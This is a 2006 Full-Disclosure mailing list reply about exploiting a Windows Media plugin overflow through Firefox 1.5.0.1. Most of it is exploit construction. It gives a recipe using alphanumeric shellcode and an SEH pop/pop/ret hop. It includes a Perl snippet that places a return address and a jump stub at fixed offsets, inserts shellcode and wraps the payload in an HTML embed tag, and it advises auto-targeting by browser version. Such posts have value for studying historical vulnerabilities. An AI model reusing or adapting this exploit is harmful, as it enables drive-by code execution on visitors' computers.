Still getting some annoying crashes (SEH trick in alphanum code is annoying when you are trying to debug something...), but the basic solution is:
1) Use alphanumeric shellcode 2) Use a return address that does not have bytes over 0x7F 3) Use a pop/pop/ret and hop over return w/o restricted bytes my $pattern = Pex::Text::PatternCreate(16384); substr($pattern, 2086, 4, pack('V', 0x60082336)); # pop ebx, pop ebp, ret substr($pattern, 2082, 4, "ABC="); # inc, inc, inc, cmp eax, [ptr] substr($pattern, 2090, length($shellcode), $shellcode); $content = "<html><body><embed src=\"$pattern.wmv\"></body></html>"; Return address is from js3250.dlll in Firefox 1.5.0.1, you should auto-target based on the browser version. -HD On Thursday 16 February 2006 16:26, c0ntex wrote: > No exploit, just some basic research - anyone with 100% Ascii win32 > shellcode? > > http://open-security.org/winmedia/index.html > > -- > > regards > c0ntex > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/